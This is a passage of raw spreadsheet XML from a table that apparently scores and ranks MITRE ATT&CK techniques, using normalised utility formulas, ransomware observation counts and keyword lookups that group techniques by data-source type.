      </c>
      <c r="Z85" s="37">
        <v>23</v>
      </c>
      <c r="AA85" s="37">
        <v>0.23</v>
      </c>
      <c r="AB85" s="37">
        <v>0.23</v>
      </c>
      <c r="AC85" s="37"/>
      <c r="AD85" s="50" t="s">
        <v>143</v>
      </c>
      <c r="AE85" s="37" t="str" cm="1">
        <f t="array" ref="AE85">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD85)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF85" s="37">
        <v>81</v>
      </c>
      <c r="AG85" s="37" t="str" cm="1">
        <f t="array" ref="AG85">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD85)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH85" s="37">
        <v>81</v>
      </c>
      <c r="AI85" s="37" t="str" cm="1">
        <f t="array" ref="AI85">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD85)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ85" s="37">
        <v>81</v>
      </c>
      <c r="AK85" s="37" t="str" cm="1">
        <f t="array" ref="AK85">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD85)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL85" s="37">
        <v>81</v>
      </c>
      <c r="AM85" s="37" t="str" cm="1">
        <f t="array" ref="AM85">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD85)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN85" s="37">
        <v>0</v>
      </c>
      <c r="AO85" s="37">
        <v>0</v>
      </c>
      <c r="AP85" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ85" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>57.777788095238101</v>
      </c>
      <c r="AR85" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS85" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT85" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU8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86" spans="1:47" ht="34">
      <c r="A86" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B86" s="37">
        <f t="shared" si="1"/>
        <v>57.966666666666661</v>
      </c>
      <c r="C86" s="37" t="s">
        <v>329</v>
      </c>
      <c r="D86" s="50" t="s">
        <v>330</v>
      </c>
      <c r="E86" s="37"/>
      <c r="F86" s="37">
        <v>1</v>
      </c>
      <c r="G86" s="37">
        <v>1</v>
      </c>
      <c r="H86" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I86" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J86" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K86" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L86" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M86" s="37">
        <v>0</v>
      </c>
      <c r="N86" s="56">
        <v>1</v>
      </c>
      <c r="O86" s="56">
        <v>8</v>
      </c>
      <c r="P86" s="56">
        <v>1</v>
      </c>
      <c r="Q86" s="56">
        <v>6</v>
      </c>
      <c r="R86" s="57"/>
      <c r="S86" s="57">
        <v>0</v>
      </c>
      <c r="T86" s="57"/>
      <c r="U86" s="57">
        <v>0</v>
      </c>
      <c r="V86" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>7.6190476190476183E-2</v>
      </c>
      <c r="W86" s="37">
        <v>0</v>
      </c>
      <c r="X86" s="37">
        <v>0</v>
      </c>
      <c r="Y86" s="37">
        <v>0</v>
      </c>
      <c r="Z86" s="37">
        <v>16</v>
      </c>
      <c r="AA86" s="37">
        <v>0.16</v>
      </c>
      <c r="AB86" s="37">
        <v>0.16</v>
      </c>
      <c r="AC86" s="37"/>
      <c r="AD86" s="50" t="s">
        <v>131</v>
      </c>
      <c r="AE86" s="37" t="str" cm="1">
        <f t="array" ref="AE86">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD86)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF86" s="37">
        <v>82</v>
      </c>
      <c r="AG86" s="37" t="str" cm="1">
        <f t="array" ref="AG86">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD86)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH86" s="37">
        <v>82</v>
      </c>
      <c r="AI86" s="37" t="str" cm="1">
        <f t="array" ref="AI86">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD86)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ86" s="37">
        <v>82</v>
      </c>
      <c r="AK86" s="37" t="str" cm="1">
        <f t="array" ref="AK86">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD86)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL86" s="37">
        <v>82</v>
      </c>
      <c r="AM86" s="37" t="str" cm="1">
        <f t="array" ref="AM86">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD86)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN86" s="37">
        <v>0</v>
      </c>
      <c r="AO86" s="37">
        <v>2</v>
      </c>
      <c r="AP86" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ86" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>19.322222222222219</v>
      </c>
      <c r="AR86" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS86" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT86" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU8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0.96772486772486754</v>
      </c>
    </row>
    <row r="87" spans="1:47" ht="34">
      <c r="A87" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B87" s="37">
        <f t="shared" si="1"/>
        <v>33.300000000000004</v>
      </c>
      <c r="C87" s="37" t="s">
        <v>331</v>
      </c>
      <c r="D87" s="50" t="s">
        <v>332</v>
      </c>
      <c r="E87" s="37"/>
      <c r="F87" s="37">
        <v>1</v>
      </c>
      <c r="G87" s="37">
        <v>1</v>
      </c>
      <c r="H87" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I87" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J87" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K87" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L87" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M87" s="37">
        <v>0</v>
      </c>
      <c r="N87" s="56">
        <v>0</v>
      </c>
      <c r="O87" s="56">
        <v>0</v>
      </c>
      <c r="P87" s="56">
        <v>0</v>
      </c>
      <c r="Q87" s="56">
        <v>0</v>
      </c>
      <c r="R87" s="57"/>
      <c r="S87" s="57">
        <v>0</v>
      </c>
      <c r="T87" s="57"/>
      <c r="U87" s="57">
        <v>0</v>
      </c>
      <c r="V87" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W87" s="37">
        <v>0</v>
      </c>
      <c r="X87" s="37">
        <v>0</v>
      </c>
      <c r="Y87" s="37">
        <v>0</v>
      </c>
      <c r="Z87" s="37">
        <v>0</v>
      </c>
      <c r="AA87" s="37">
        <v>0</v>
      </c>
      <c r="AB87" s="37">
        <v>0</v>
      </c>
      <c r="AC87" s="37" t="s">
        <v>209</v>
      </c>
      <c r="AD87" s="50" t="s">
        <v>333</v>
      </c>
      <c r="AE87" s="37" t="str" cm="1">
        <f t="array" ref="AE87">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD87)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF87" s="37">
        <v>83</v>
      </c>
      <c r="AG87" s="37" t="str" cm="1">
        <f t="array" ref="AG87">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD87)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH87" s="37">
        <v>83</v>
      </c>
      <c r="AI87" s="37" t="str" cm="1">
        <f t="array" ref="AI87">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD87)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ87" s="37">
        <v>83</v>
      </c>
      <c r="AK87" s="37" t="str" cm="1">
        <f t="array" ref="AK87">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD87)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL87" s="37">
        <v>83</v>
      </c>
      <c r="AM87" s="37" t="str" cm="1">
        <f t="array" ref="AM87">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD87)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN87" s="37">
        <v>0</v>
      </c>
      <c r="AO87" s="37"/>
      <c r="AP87" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ87" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>11.100000000000001</v>
      </c>
      <c r="AR87" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS87" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT87" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU8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88" spans="1:47" ht="34">
      <c r="A88" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B88" s="37">
        <f t="shared" si="1"/>
        <v>113.93801500000001</v>
      </c>
      <c r="C88" s="37" t="s">
        <v>334</v>
      </c>
      <c r="D88" s="50" t="s">
        <v>335</v>
      </c>
      <c r="E88" s="37"/>
      <c r="F88" s="37">
        <v>1</v>
      </c>
      <c r="G88" s="37">
        <v>1</v>
      </c>
      <c r="H88" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I88" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J88" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K88" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L88" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M88" s="37">
        <v>0</v>
      </c>
      <c r="N88" s="56">
        <v>0</v>
      </c>
      <c r="O88" s="56">
        <v>0</v>
      </c>
      <c r="P88" s="56">
        <v>0</v>
      </c>
      <c r="Q88" s="56">
        <v>0</v>
      </c>
      <c r="R88" s="57" t="s">
        <v>336</v>
      </c>
      <c r="S88" s="57">
        <v>6</v>
      </c>
      <c r="T88" s="57" t="s">
        <v>337</v>
      </c>
      <c r="U88" s="57">
        <v>19</v>
      </c>
      <c r="V88" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.238095</v>
      </c>
      <c r="W88" s="37">
        <v>25</v>
      </c>
      <c r="X88" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Y88" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Z88" s="37">
        <v>0</v>
      </c>
      <c r="AA88" s="37">
        <v>0</v>
      </c>
      <c r="AB88" s="37">
        <v>0</v>
      </c>
      <c r="AC88" s="37"/>
      <c r="AD88" s="50" t="s">
        <v>338</v>
      </c>
      <c r="AE88" s="37" t="str" cm="1">
        <f t="array" ref="AE88">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD88)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF88" s="37">
        <v>84</v>
      </c>
      <c r="AG88" s="37" t="str" cm="1">
        <f t="array" ref="AG88">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD88)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH88" s="37">
        <v>84</v>
      </c>
      <c r="AI88" s="37" t="str" cm="1">
        <f t="array" ref="AI88">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD88)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ88" s="37">
        <v>84</v>
      </c>
      <c r="AK88" s="37" t="str" cm="1">
        <f t="array" ref="AK88">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD88)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL88" s="37">
        <v>84</v>
      </c>
      <c r="AM88" s="37" t="str" cm="1">
        <f t="array" ref="AM88">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD88)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN88" s="37">
        <v>0</v>
      </c>
      <c r="AO88" s="37">
        <v>0</v>
      </c>
      <c r="AP88" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ88" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>37.979338333333338</v>
      </c>
      <c r="AR88" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS88" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT88" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU8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89" spans="1:47" ht="34">
      <c r="A89" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B89" s="37">
        <f t="shared" si="1"/>
        <v>115.29039500000002</v>
      </c>
      <c r="C89" s="37" t="s">
        <v>339</v>
      </c>
      <c r="D89" s="50" t="s">
        <v>335</v>
      </c>
      <c r="E89" s="37" t="s">
        <v>340</v>
      </c>
      <c r="F89" s="37">
        <v>1</v>
      </c>
      <c r="G89" s="37">
        <v>1</v>
      </c>
      <c r="H89" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I89" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J89" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K89" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L89" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M89" s="37">
        <v>0</v>
      </c>
      <c r="N89" s="56">
        <v>0</v>
      </c>
      <c r="O89" s="56">
        <v>0</v>
      </c>
      <c r="P89" s="56">
        <v>0</v>
      </c>
      <c r="Q89" s="56">
        <v>0</v>
      </c>
      <c r="R89" s="57" t="s">
        <v>336</v>
      </c>
      <c r="S89" s="57">
        <v>6</v>
      </c>
      <c r="T89" s="57" t="s">
        <v>337</v>
      </c>
      <c r="U89" s="57">
        <v>19</v>
      </c>
      <c r="V89" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.238095</v>
      </c>
      <c r="W89" s="37">
        <v>25</v>
      </c>
      <c r="X89" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Y89" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Z89" s="37">
        <v>0</v>
      </c>
      <c r="AA89" s="37">
        <v>0</v>
      </c>
      <c r="AB89" s="37">
        <v>0</v>
      </c>
      <c r="AC89" s="37"/>
      <c r="AD89" s="50" t="s">
        <v>338</v>
      </c>
      <c r="AE89" s="37" t="str" cm="1">
        <f t="array" ref="AE89">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD89)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF89" s="37">
        <v>85</v>
      </c>
      <c r="AG89" s="37" t="str" cm="1">
        <f t="array" ref="AG89">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD89)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH89" s="37">
        <v>85</v>
      </c>
      <c r="AI89" s="37" t="str" cm="1">
        <f t="array" ref="AI89">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD89)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ89" s="37">
        <v>85</v>
      </c>
      <c r="AK89" s="37" t="str" cm="1">
        <f t="array" ref="AK89">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD89)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL89" s="37">
        <v>85</v>
      </c>
      <c r="AM89" s="37" t="str" cm="1">
        <f t="array" ref="AM89">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD89)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN89" s="37">
        <v>0</v>
      </c>
      <c r="AO89" s="37">
        <v>0</v>
      </c>
      <c r="AP89" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ89" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>38.430131666666675</v>
      </c>
      <c r="AR89" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS89" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT89" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU8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90" spans="1:47" ht="68">
      <c r="A90" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="B90" s="37">
        <f t="shared" si="1"/>
        <v>729.42848928571425</v>
      </c>
      <c r="C90" s="37" t="s">
        <v>341</v>
      </c>
      <c r="D90" s="50" t="s">
        <v>342</v>
      </c>
      <c r="E90" s="37"/>
      <c r="F90" s="37">
        <v>7</v>
      </c>
      <c r="G90" s="37">
        <v>5</v>
      </c>
      <c r="H90" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.6</v>
      </c>
      <c r="I90" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.7</v>
      </c>
      <c r="J90" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.7</v>
      </c>
      <c r="K90" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.5</v>
      </c>
      <c r="L90" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.5</v>
      </c>
      <c r="M90" s="37">
        <v>1</v>
      </c>
      <c r="N90" s="56">
        <v>0</v>
      </c>
      <c r="O90" s="56">
        <v>11</v>
      </c>
      <c r="P90" s="56">
        <v>19</v>
      </c>
      <c r="Q90" s="56">
        <v>28</v>
      </c>
      <c r="R90" s="57" t="s">
        <v>343</v>
      </c>
      <c r="S90" s="57">
        <v>10</v>
      </c>
      <c r="T90" s="57" t="s">
        <v>344</v>
      </c>
      <c r="U90" s="57">
        <v>15</v>
      </c>
      <c r="V90" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.51428547619047615</v>
      </c>
      <c r="W90" s="37">
        <v>25</v>
      </c>
      <c r="X90" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Y90" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Z90" s="37">
        <v>58</v>
      </c>
      <c r="AA90" s="37">
        <v>0.57999999999999996</v>
      </c>
      <c r="AB90" s="37">
        <v>0.57999999999999996</v>
      </c>
      <c r="AC90" s="37"/>
      <c r="AD90" s="50" t="s">
        <v>345</v>
      </c>
      <c r="AE90" s="37" t="str" cm="1">
        <f t="array" ref="AE90">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD90)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF90" s="37">
        <v>86</v>
      </c>
      <c r="AG90" s="37" t="str" cm="1">
        <f t="array" ref="AG90">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD90)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH90" s="37">
        <v>86</v>
      </c>
      <c r="AI90" s="37" t="str" cm="1">
        <f t="array" ref="AI90">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD90)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ90" s="37">
        <v>86</v>
      </c>
      <c r="AK90" s="37" t="str" cm="1">
        <f t="array" ref="AK90">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD90)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL90" s="37">
        <v>86</v>
      </c>
      <c r="AM90" s="37" t="str" cm="1">
